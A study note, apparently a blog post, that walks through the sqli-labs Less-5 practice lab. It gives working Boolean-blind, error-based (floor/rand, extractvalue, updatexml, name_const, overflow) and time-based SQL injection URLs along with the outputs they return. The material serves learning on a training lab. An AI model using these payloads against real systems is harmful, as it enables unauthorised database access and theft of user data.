Reference: Sqli-labs less 5: https://www.cnblogs.com/lcamry/p/6122257.html 12 types of error injection + universal statements: https://www.jianshu.com/p/bc35f8dd4f7c Common functions in SQL injection: https://www.jianshu.com/p/146cabe5959d sqli-labs-Less5 Learn about various error injections: https://blog.csdn.net/rfrder/article/details/108674217 https://blog.csdn.net/m0_47470899/article/details/118695774 https://blog.csdn.net/like98k/article/details/79436463 Detailed explanation of double query injection: https://blog.csdn.net/Leep0rt/article/details/78556440
principle:
The function comes from the xiaodi day 16 document:
like 'ro%' #Judge whether ro or ro... is true regexp '^xiaodi[a-z]' #match xiaodi and xiaodi...etc. if(condition,5,0) #If the condition is established, return 5; otherwise, return 0 sleep(5) #SQL statement is executed with a delay of 5 seconds mid(a,b,c) #Start from position b, intercept the c bit of a string substr(a,b,c) #starting from position b, intercept the c length of string a left(database(),1), database() #left(a,b) intercepts the first b bits of a from the left length(database())=8 #Determine the length of the database database() name ord=ascii ascii(x)=97 #Determine whether the ascii code of x is equal to 97
Boolean injection
Can only run in a loop
1. Determine type
http://sql-labs:8086/Less-5/?id=1'
2. Determine the version number
Check whether the first digit of the version number is 5. I don’t know why sometimes I use # and sometimes I use –
http://sql-labs:8086/Less-5/?id=1' and left(version(),1)=5-- +
If the Boolean injection is correct, nothing will be displayed.
3. Database length
First look at the length of the database before you can make a judgment.
http://sql-labs:8086/Less-5/?id=1' and length(database())=8-- +
4. Guess database characters
http://sql-labs:8086/Less-5/?id=1' and left(database(),1)>'a'-- + indicates that the first one is greater than a http://sql-labs:8086/Less-5/?id=1' and left(database(),1)='s'-- + indicates that the first one is equal to a http://sql-labs:8086/Less-5/?id=1' and left(database(),2)>'sa'-- + indicates that the first one is greater than sa
5. Get the characters of the security database
The first character of the first table email 101=e
http://sql-labs:8086/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1 ))=101 -- +
The second character m of the first table
http://sql-labs:8086/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1 ))=109- +
Get the first character of the second table. The second one represents the referers table, so the first character is r. (mysql injection is wrong)
http://sql-labs:8086/Less-5/?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1 ))=114-- +
6. Use regexp to get the column names in the users table
http://sql-labs:8086/Less-5/?id=1' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^username' limit 0,1)-- +
7. Get the contents of the users table
http://sql-labs:8086/Less-5/?id=1' and ord(mid((select ifnull(cast(username as char),0x20)) from security.users order by id limit 0 ,1),1,1))=68-- +
Get the contents of the users table. Get the ascii of the first character of the first line in username, compare it with 68, which is D
2. Error injection:
1. Obtain user permissions
http://sql-labs:8086/Less-5/?id=1' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor (rand(0)*2))a from information_schema.columns group by a-- + Duplicate entry '::root@localhost::1' for key '
2. Get the database name
http://sql-labs:8086/Less-5/?id=1' union select 1,count(*),concat((select database()),floor(rand()*2)) a from information_schema.columns group by a -- + Duplicate entry 'security1' for key ''
Sometimes it is a normal state, so you need to run it a few more times.
3. Get the table name in the database
http://sql-labs:8086/Less-5/?id=1' union select 1,count(*),concat((select group_concat(table_name) from information_schema.tables where table_schema='security '),floor(rand()*2))a from information_schema.columns group by a-- + Duplicate entry 'emails,referers,uagents,users0' for key '' Duplicate entry 'emails,referers,uagents,users1' for key ''
http://sql-labs:8086/Less-5/?id=1' union select count(*),1, concat('~',(select table_name from information_schema.tables where table_schema= 'security' limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a-- + Duplicate entry '~emails~0' for key ''
Execute it twice more to get the result. Modify limit 0,1 to get the corresponding
4. Get column names in the database
http://sql-labs:8086/Less-5/?id=1' union select 1,count(*),concat((select group_concat(column_name) from information_schema.columns where table_name='users '),floor(rand()*2))a from information_schema.columns group by a-- + Duplicate entry 'user_id,first_name,last_name,user,password,avatar,last_login,fai' for key ''
It can be seen that it is not accurate, but it is multiple at a time
http://sql-labs:8086/Less-5/?id=1' union select count(*),1, concat('~',(select column_name from information_schema.columns where table_schema= 'security' and table_name='emails' limit 0,1),'~', floor(rand()*2)) as a from information_schema.tables group by a-- + Duplicate entry '~id~0' for key ''
one at a time
5. Get data
http://sql-labs:8086/Less-5/?id=1' union select count(*),1, concat('~',(select username from users limit 0,1) ,'~', floor(rand()*2)) as a from information_schema.tables group by a-- + Duplicate entry '~Dumb~0' for key ''
Other ways to report errors:
I use the double value type to inject errors out of range. I can’t get it out. I don’t know why?
http://sql-labs:8086/Less-5/?id=1' union select (exp(~(select * from(select user())a))),2,3-- +
Using bigint overflow for error injection. I can’t get out. I don’t know why?
http://sql-labs:8086/Less-5/?id=-1 ' union select (!(select * from (select user())x) - ~0),2,3-- +
xpath function error injection
http://sql-labs:8086/Less-5/?id=-1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))-- + http://sql-labs:8086/Less-5/?id=-1' and updatexml(1,concat(0x7e,(select @@version),0x7e),1)-- + XPATH syntax error: '~5.7.26~'
Taking advantage of data duplication name_const()
http://sql-labs:8086/Less-5/?id=-1' union select 1,2,3 from (select name_const(version(),1),name_const(version(),1 ))x -- + Duplicate column name '5.7.26'
However, this method is too useless, because if the parameter passed into NAME_CONST is not a constant, an error will be reported (not the kind of error reported by error injection). It seems that only version() can be used
3. Delayed injection
Using if() and sleep() 115=s
http://sql-labs:8086/Less-5/?id=1' and If(ascii(substr(database(),1,1))=115,1,sleep(5))- - +
If incorrect, wait 5 seconds
This article refers to some articles. If there is any infringement, please contact me.